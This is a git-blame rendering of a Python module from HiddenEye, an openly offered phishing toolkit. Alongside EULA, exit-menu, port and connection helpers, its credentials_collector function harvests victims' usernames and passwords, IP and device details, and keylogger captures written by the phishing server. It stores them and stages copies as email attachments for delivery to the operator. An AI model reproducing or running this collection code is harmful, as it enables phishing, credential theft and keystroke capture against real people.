2020-05-11 12:12:06 +03:00
|
|
|
#
|
|
|
|
# HiddenEye Copyright (C) 2020 DarkSec https://dark-sec-official.com
|
|
|
|
# This program comes with ABSOLUTELY NO WARRANTY; for details read LICENSE.
|
|
|
|
# This is free software, and you are welcome to redistribute it
|
|
|
|
# under certain conditions; you can read LICENSE for details.
|
|
|
|
#
|
2020-06-01 13:47:37 +05:30
|
|
|
import Defs.ActionManager.Server.server_runner as server_runner
|
2020-07-12 20:32:18 +00:00
|
|
|
import Defs.FeatureManager.EmailManager.email_prompt as email_prompt
|
2020-05-11 11:55:19 +03:00
|
|
|
import Defs.LocalizationManager.lang_action_manager.lang_simple_informant as localization
|
|
|
|
import Defs.LocalizationManager.lang_global_usage as global_localization
|
2020-07-12 20:32:18 +00:00
|
|
|
import Defs.ThemeManager.theme as theme
|
2020-07-12 20:32:19 +00:00
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import chmod
|
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import copyfile
|
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import getuid
|
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import pathlib_Path
|
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import platform
|
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import requests
|
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import run_command
|
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import stat
|
|
|
|
from Defs.ImportManager.unsorted_will_be_replaced import try_to_run_command
|
2020-05-06 15:53:52 +03:00
|
|
|
|
2020-05-06 18:00:28 +03:00
|
|
|
default_palette = theme.default_palette
|
2020-05-06 15:53:52 +03:00
|
|
|
|
2020-05-14 15:44:13 -05:00
|
|
|
|
2020-05-11 13:09:41 +03:00
|
|
|
def license_handler():
|
2020-06-09 07:28:31 +03:00
|
|
|
""" Checks if eula.txt exists, creates one if it doesn't. Checks if "eula = True" is inside.
|
|
|
|
|
|
|
|
Returns:
|
|
|
|
boolean: Returns True if "eula = True" is inside eula.txt, False by default.
|
|
|
|
"""
|
2020-05-11 13:09:41 +03:00
|
|
|
eula = pathlib_Path("eula.txt")
|
|
|
|
if eula.exists():
|
2020-07-12 20:32:17 +00:00
|
|
|
with open("eula.txt", "r") as f:
|
|
|
|
if "eula = True" in f.read():
|
|
|
|
print("Found your license agreement, proceeding...")
|
2020-05-11 13:09:41 +03:00
|
|
|
return True
|
|
|
|
else:
|
2020-07-12 20:32:17 +00:00
|
|
|
print("Please read and accept license.")
|
2020-05-11 13:09:41 +03:00
|
|
|
return False
|
|
|
|
else:
|
|
|
|
eula.touch(mode=0o777, exist_ok=True)
|
2020-07-12 20:32:17 +00:00
|
|
|
eula = open("eula.txt", "w")
|
2020-05-11 13:32:46 +03:00
|
|
|
eula.write(localization.write_eula + "eula = False")
|
2020-05-11 13:09:41 +03:00
|
|
|
eula.close()
|
2020-07-12 20:32:17 +00:00
|
|
|
print("Please accept EULA.")
|
2020-05-11 13:09:41 +03:00
|
|
|
return False
|
|
|
|
|
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
def exit_message(port=80): # Message when HiddenEye exit
|
2020-06-09 07:28:41 +03:00
|
|
|
"""Displays preconfigured message when HiddenEye execution ends or user tries to leave app.
|
|
|
|
|
2020-08-09 21:41:30 -05:00
|
|
|
Args: port (int, optional): Will be used as port value if custom one isn't provided. Needed in case user decides
|
|
|
|
to restart app again. Defaults to 80.
|
2020-06-09 07:28:41 +03:00
|
|
|
|
|
|
|
Returns:
|
|
|
|
method: If no option is selected, exit message returns to self and gets shown again.
|
|
|
|
"""
|
2020-05-11 11:55:43 +03:00
|
|
|
choice = input(localization.lang_exit_message["choice"])
|
|
|
|
choice.lower()
|
2020-07-12 20:32:17 +00:00
|
|
|
if choice == "r":
|
|
|
|
run_command(["sudo", "python3", "HiddenEye.py"])
|
|
|
|
elif choice == "m":
|
2020-05-06 18:00:28 +03:00
|
|
|
email_prompt.captured_data_email_confirmation(port)
|
2020-07-12 20:32:17 +00:00
|
|
|
elif choice == "s":
|
2020-06-01 13:47:37 +05:30
|
|
|
server_runner.server_selection(port)
|
2020-07-12 20:32:17 +00:00
|
|
|
elif choice == "x":
|
|
|
|
run_command("clear")
|
2020-05-11 11:55:19 +03:00
|
|
|
print(global_localization.hidden_eye_logo)
|
2020-07-12 20:32:17 +00:00
|
|
|
print(" " + global_localization.by_darksec)
|
2020-07-12 20:32:24 +00:00
|
|
|
print(" " +
|
|
|
|
global_localization.official_website_link)
|
2020-05-11 11:55:19 +03:00
|
|
|
print(localization.lang_exit_message["help_to_improve_this_tool"])
|
|
|
|
print(localization.lang_exit_message["tell_if_page_got_broken"])
|
2020-07-12 20:32:24 +00:00
|
|
|
print(
|
|
|
|
localization.lang_exit_message["make_your_pull_request_or_issue"])
|
2020-05-11 11:55:19 +03:00
|
|
|
print(localization.lang_exit_message["small_disclaimer_suggestion"])
|
|
|
|
print(localization.lang_exit_message["forum_suggestion"])
|
|
|
|
print(localization.lang_exit_message["financial_support"])
|
|
|
|
print(localization.lang_exit_message["thank_you"])
|
2020-05-06 14:25:28 +03:00
|
|
|
else:
|
2020-07-12 20:32:17 +00:00
|
|
|
run_command("clear")
|
2020-05-06 15:19:24 +03:00
|
|
|
return exit_message(port)
|
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
|
2020-06-15 02:14:29 +03:00
|
|
|
def terms_of_service_message():
|
|
|
|
"""Requests user to provide agreement to license provided.
|
2020-06-09 07:28:53 +03:00
|
|
|
|
|
|
|
Returns:
|
|
|
|
boolean: Always returns True, if user doesn't accept agreement - proceeds to exit()
|
|
|
|
"""
|
2020-05-11 13:09:41 +03:00
|
|
|
agreement = license_handler()
|
2020-05-14 15:44:13 -05:00
|
|
|
if not agreement:
|
2020-05-11 13:09:41 +03:00
|
|
|
print(localization.lang_terms_of_service_message["GPL_3.0"])
|
2020-08-09 21:41:30 -05:00
|
|
|
print(localization.lang_terms_of_service_message["great_power_great_responsibility"])
|
2020-07-12 20:32:24 +00:00
|
|
|
print(localization.
|
|
|
|
lang_terms_of_service_message["do_you_accept_license"])
|
|
|
|
print(localization.
|
|
|
|
lang_terms_of_service_message["enter_this_to_confirm"])
|
2020-05-11 13:09:41 +03:00
|
|
|
agreement = input(global_localization.input_line)
|
2020-05-11 13:32:46 +03:00
|
|
|
if localization.text_to_confirm_license not in agreement:
|
2020-07-12 20:32:24 +00:00
|
|
|
print(localization.
|
|
|
|
lang_terms_of_service_message["you_are_not_allowed"])
|
2020-05-11 13:09:41 +03:00
|
|
|
exit()
|
|
|
|
else:
|
2020-07-12 20:32:17 +00:00
|
|
|
eula = open("eula.txt", "w")
|
2020-07-12 20:32:13 +00:00
|
|
|
eula.write(localization.write_eula + "eula = True")
|
2020-05-11 13:09:41 +03:00
|
|
|
eula.close()
|
|
|
|
return True
|
|
|
|
else:
|
|
|
|
return True
|
2020-06-15 02:14:29 +03:00
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
|
2020-06-11 12:57:16 +03:00
|
|
|
def module_loading_message(option_name): # This one just show text..
|
2020-06-09 07:39:37 +03:00
|
|
|
"""Prints "Select any mode" message. """
|
2020-06-11 12:57:16 +03:00
|
|
|
print(option_name + localization.lang_module_loading_message["is_loaded"])
|
2020-05-11 14:11:35 +03:00
|
|
|
print(localization.lang_module_loading_message["select_any_mode"])
|
2020-05-06 15:53:52 +03:00
|
|
|
|
|
|
|
|
2020-06-09 08:02:36 +03:00
|
|
|
def credentials_collector():
|
|
|
|
"""Collects, writes and returns credentials and additional info gathered from target."""
|
2020-05-11 14:11:20 +03:00
|
|
|
print(localization.lang_credentials_collector["waiting_for_interaction"])
|
2020-05-06 15:19:24 +03:00
|
|
|
while True:
|
2020-07-12 20:32:17 +00:00
|
|
|
with open("Server/www/usernames.txt") as creds:
|
2020-05-06 15:19:24 +03:00
|
|
|
lines = creds.read().rstrip()
|
|
|
|
if len(lines) != 0:
|
2020-07-12 20:32:24 +00:00
|
|
|
log_writer(localization.
|
|
|
|
lang_credentials_collector["credentials_found"] +
|
|
|
|
"{0}{2}{1}".format(default_palette[2],
|
|
|
|
default_palette[3], lines))
|
2020-07-12 20:32:17 +00:00
|
|
|
pathlib_Path("Server/CapturedData/usernames.txt").touch(
|
2020-07-12 20:32:24 +00:00
|
|
|
mode=0o777, exist_ok=True)
|
|
|
|
captured_usernames = open("Server/CapturedData/usernames.txt",
|
|
|
|
"a")
|
2020-07-12 20:32:17 +00:00
|
|
|
new_usernames = open("Server/www/usernames.txt")
|
2020-05-08 14:38:29 +03:00
|
|
|
captured_usernames.write(new_usernames.read())
|
|
|
|
new_usernames.close()
|
|
|
|
captured_usernames.close()
|
2020-07-12 20:32:17 +00:00
|
|
|
copyfile(
|
|
|
|
"Server/CapturedData/usernames.txt",
|
|
|
|
"Defs/FeatureManager/EmailManager/attachments/usernames.txt",
|
|
|
|
)
|
2020-05-06 15:19:24 +03:00
|
|
|
|
2020-07-12 20:32:17 +00:00
|
|
|
new_usernames = open("Server/www/usernames.txt", "w")
|
|
|
|
new_usernames.write("")
|
2020-05-08 14:38:29 +03:00
|
|
|
new_usernames.close()
|
2020-05-06 15:19:24 +03:00
|
|
|
|
2020-07-12 20:32:17 +00:00
|
|
|
with open("Server/www/ip.txt") as creds:
|
2020-05-06 15:19:24 +03:00
|
|
|
lines = creds.read().rstrip()
|
|
|
|
if len(lines) != 0:
|
2020-07-12 20:32:24 +00:00
|
|
|
log_writer(localization.
|
|
|
|
lang_credentials_collector["device_details_found"] +
|
|
|
|
"{0}{2}{1}".format(default_palette[2],
|
|
|
|
default_palette[3], lines))
|
|
|
|
pathlib_Path("Server/CapturedData/ip.txt").touch(mode=0o777,
|
|
|
|
exist_ok=True)
|
2020-07-12 20:32:17 +00:00
|
|
|
captured_ips = open("Server/CapturedData/ip.txt", "a")
|
|
|
|
new_ips = open("Server/www/ip.txt")
|
2020-05-08 14:38:44 +03:00
|
|
|
captured_ips.write(new_ips.read())
|
|
|
|
new_ips.close()
|
|
|
|
captured_ips.close()
|
2020-07-12 20:32:17 +00:00
|
|
|
copyfile(
|
|
|
|
"Server/CapturedData/ip.txt",
|
|
|
|
"Defs/FeatureManager/EmailManager/attachments/ip.txt",
|
|
|
|
)
|
|
|
|
new_ips = open("Server/www/ip.txt", "w")
|
|
|
|
new_ips.write("")
|
2020-05-08 14:38:44 +03:00
|
|
|
new_ips.close()
|
|
|
|
|
2020-05-06 15:19:24 +03:00
|
|
|
creds.close()
|
|
|
|
|
2020-07-12 20:32:17 +00:00
|
|
|
with open("Server/www/KeyloggerData.txt") as creds:
|
2020-05-06 15:19:24 +03:00
|
|
|
lines = creds.read().rstrip()
|
|
|
|
if len(lines) != 0:
|
2020-05-11 14:11:20 +03:00
|
|
|
log_writer(global_localization.line_of_dots)
|
2020-07-12 20:32:24 +00:00
|
|
|
log_writer(localization.
|
|
|
|
lang_credentials_collector["getting_pressed_keys"] +
|
|
|
|
"{0}{2}{1}".format(default_palette[2],
|
|
|
|
default_palette[3], lines))
|
2020-07-12 20:32:17 +00:00
|
|
|
pathlib_Path("Server/CapturedData/KeyloggerData.txt").touch(
|
2020-07-12 20:32:24 +00:00
|
|
|
mode=0o777, exist_ok=True)
|
|
|
|
captured_keys = open("Server/CapturedData/KeyloggerData.txt",
|
|
|
|
"a")
|
2020-07-12 20:32:17 +00:00
|
|
|
new_keys = open("Server/www/KeyloggerData.txt")
|
2020-05-08 18:43:45 +03:00
|
|
|
captured_keys.write(new_keys.read())
|
|
|
|
new_keys.close()
|
|
|
|
captured_keys.close()
|
2020-07-12 20:32:17 +00:00
|
|
|
copyfile(
|
|
|
|
"Server/CapturedData/KeyloggerData.txt",
|
|
|
|
"Defs/FeatureManager/EmailManager/attachments/KeyloggerData.txt",
|
|
|
|
)
|
|
|
|
new_keys = open("Server/www/KeyloggerData.txt", "w")
|
|
|
|
new_keys.write("")
|
2020-05-08 18:43:45 +03:00
|
|
|
new_keys.close()
|
|
|
|
|
2020-05-11 14:11:20 +03:00
|
|
|
log_writer(global_localization.line_of_dots)
|
2020-05-06 15:19:24 +03:00
|
|
|
|
|
|
|
creds.close()
|
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
|
2020-05-06 15:19:24 +03:00
|
|
|
def log_writer(ctx): # Writing log
|
2020-06-09 08:03:08 +03:00
|
|
|
"""I have no idea what it does, someone does, so if you are reading this - explain wtf is this method...
|
|
|
|
|
|
|
|
Args:
|
|
|
|
ctx ([type]): [description]
|
|
|
|
"""
|
2020-08-09 21:41:30 -05:00
|
|
|
log_file = open("log.txt", "w")
|
|
|
|
log_file.write(
|
2020-07-12 20:32:24 +00:00
|
|
|
ctx.replace(default_palette[0], "").replace(
|
|
|
|
default_palette[1], "").replace(default_palette[2], "").replace(
|
2020-08-09 19:43:08 -05:00
|
|
|
default_palette[3], "").replace(default_palette[4], "") + "\n")
|
2020-05-06 15:19:24 +03:00
|
|
|
print(ctx)
|
2020-05-06 15:53:52 +03:00
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
|
2020-06-09 02:25:27 +03:00
|
|
|
def port_selector(): # Requests port input from user
|
2020-06-09 08:03:25 +03:00
|
|
|
"""Asks user to input number between 1 and 65535.
|
|
|
|
|
|
|
|
Returns:
|
|
|
|
string: Returns any number entered if it's between 1 and 65535, if it's not - asks for number again.
|
|
|
|
"""
|
2020-07-12 20:32:17 +00:00
|
|
|
run_command("clear")
|
2020-05-11 14:11:50 +03:00
|
|
|
print(global_localization.hidden_eye_logo)
|
|
|
|
print(global_localization.official_website_link)
|
|
|
|
print(global_localization.by_darksec)
|
|
|
|
print(global_localization.line_of_dots)
|
|
|
|
print(localization.lang_port_selector["website_port_selection"])
|
|
|
|
print(localization.lang_port_selector["select_any_available_port"])
|
|
|
|
print(localization.lang_port_selector["port_suggestion"])
|
|
|
|
choice = input(global_localization.input_line)
|
2020-05-06 15:53:52 +03:00
|
|
|
try:
|
2020-05-14 15:44:13 -05:00
|
|
|
if int(choice) > 65535 or int(choice) < 1:
|
2020-06-09 02:25:27 +03:00
|
|
|
return port_selector()
|
2020-05-06 15:53:52 +03:00
|
|
|
else:
|
|
|
|
return choice
|
2020-08-11 16:35:22 +03:00
|
|
|
except ValueError:
|
2020-05-06 15:53:52 +03:00
|
|
|
return port_selector()
|
2020-05-07 11:21:37 +03:00
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
|
2020-05-07 11:21:37 +03:00
|
|
|
def remove_readonly(func, path, _):
|
2020-06-09 17:28:13 +03:00
|
|
|
"""Removes read-only state of file (IDK why it exists but it does already, so...)
|
2020-06-09 08:03:57 +03:00
|
|
|
|
|
|
|
Args:
|
|
|
|
func ([type]): [description]
|
|
|
|
path ([type]): [description]
|
|
|
|
_ ([type]): [description]
|
|
|
|
"""
|
2020-08-11 16:35:35 +03:00
|
|
|
chmod(path, mode=stat.S_IWRITE)
|
2020-05-07 21:02:51 +03:00
|
|
|
func(path)
|
2020-05-08 16:43:03 +03:00
|
|
|
|
|
|
|
|
2020-05-12 16:16:45 +03:00
|
|
|
def global_message():
|
2020-06-09 17:28:13 +03:00
|
|
|
"""Sends default HiddenEye header message. (Logo, website link, etc.)"""
|
2020-05-12 16:16:45 +03:00
|
|
|
print(global_localization.hidden_eye_logo)
|
|
|
|
print(global_localization.official_website_link)
|
|
|
|
print(global_localization.by_darksec)
|
2020-05-13 18:43:58 +03:00
|
|
|
print(global_localization.line_of_dots)
|
|
|
|
|
|
|
|
|
2020-07-12 20:32:24 +00:00
|
|
|
def verify_connection(
|
|
|
|
host="https://dark-sec-official.com"): # Connection check
|
2020-07-12 20:32:17 +00:00
|
|
|
run_command("clear")
|
2020-05-13 18:43:58 +03:00
|
|
|
try:
|
|
|
|
req = requests.get(host, timeout=25)
|
|
|
|
if req.status_code == 200:
|
|
|
|
print(localization.lang_verify_connection["connected"])
|
|
|
|
pass
|
2020-08-11 16:35:22 +03:00
|
|
|
except ConnectionError:
|
2020-05-13 18:43:58 +03:00
|
|
|
print(global_localization.hidden_eye_logo)
|
2020-08-09 19:43:08 -05:00
|
|
|
print(localization.lang_verify_connection["disconnected"])
|
2020-05-13 18:43:58 +03:00
|
|
|
print(localization.lang_verify_connection["verify_your_connection"])
|
2020-08-09 19:43:08 -05:00
|
|
|
print(localization.lang_verify_connection["continue_warning"])
|
|
|
|
print(localization.lang_verify_connection["continue_confirmation"])
|
|
|
|
internet_choice = input(global_localization.input_line).lower()
|
|
|
|
if internet_choice == "y":
|
|
|
|
pass
|
|
|
|
elif internet_choice == "n":
|
|
|
|
run_command("clear")
|
|
|
|
print(global_localization.hidden_eye_logo)
|
|
|
|
print(" " + global_localization.by_darksec)
|
|
|
|
print(" " +
|
|
|
|
global_localization.official_website_link)
|
|
|
|
print(localization.lang_exit_message["help_to_improve_this_tool"])
|
|
|
|
print(localization.lang_exit_message["tell_if_page_got_broken"])
|
|
|
|
print(
|
|
|
|
localization.lang_exit_message["make_your_pull_request_or_issue"])
|
|
|
|
print(localization.lang_exit_message["small_disclaimer_suggestion"])
|
|
|
|
print(localization.lang_exit_message["forum_suggestion"])
|
|
|
|
print(localization.lang_exit_message["financial_support"])
|
|
|
|
print(localization.lang_exit_message["thank_you"])
|
|
|
|
exit()
|
|
|
|
else:
|
|
|
|
verify_connection()
|
2020-05-13 18:43:58 +03:00
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
|
2020-05-13 18:43:58 +03:00
|
|
|
def check_permissions():
|
2020-06-09 02:27:20 +03:00
|
|
|
if check_platform("system") == "Linux":
|
2020-05-13 18:43:58 +03:00
|
|
|
if getuid() == 0:
|
|
|
|
print(localization.lang_check_permissions["permissions_granted"])
|
|
|
|
else:
|
|
|
|
print(localization.lang_check_permissions["permissions_denied"])
|
|
|
|
exit()
|
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
|
2020-05-13 18:43:58 +03:00
|
|
|
def check_php():
|
|
|
|
try:
|
2020-07-12 20:32:17 +00:00
|
|
|
try_to_run_command(["php", "-v"])
|
2020-05-13 18:43:58 +03:00
|
|
|
print(localization.lang_check_php["found"])
|
2020-08-11 16:35:22 +03:00
|
|
|
except ModuleNotFoundError:
|
2020-05-13 18:43:58 +03:00
|
|
|
print(localization.lang_check_php["not-found"])
|
|
|
|
exit()
|
2020-06-09 02:27:54 +03:00
|
|
|
|
2020-07-12 20:32:13 +00:00
|
|
|
|
2020-08-11 16:35:22 +03:00
|
|
|
def check_platform(required_data: str):
|
|
|
|
""" Checks system for specific platform related data and returns requested value.
|
|
|
|
:param required_data: accepts "system" or "architecture"
|
|
|
|
:type required_data: requires string input
|
|
|
|
:return: returns data specified as required_data, Returns all if required_data isn't specified """
|
2020-06-09 02:27:54 +03:00
|
|
|
system = platform.system()
|
|
|
|
architecture = platform.machine()
|
|
|
|
if required_data == "system":
|
|
|
|
return system
|
|
|
|
elif required_data == "architecture":
|
|
|
|
return architecture
|
|
|
|
else:
|
2020-07-12 20:32:13 +00:00
|
|
|
return "System: {0}, Architecture: {1}".format(system, architecture)
|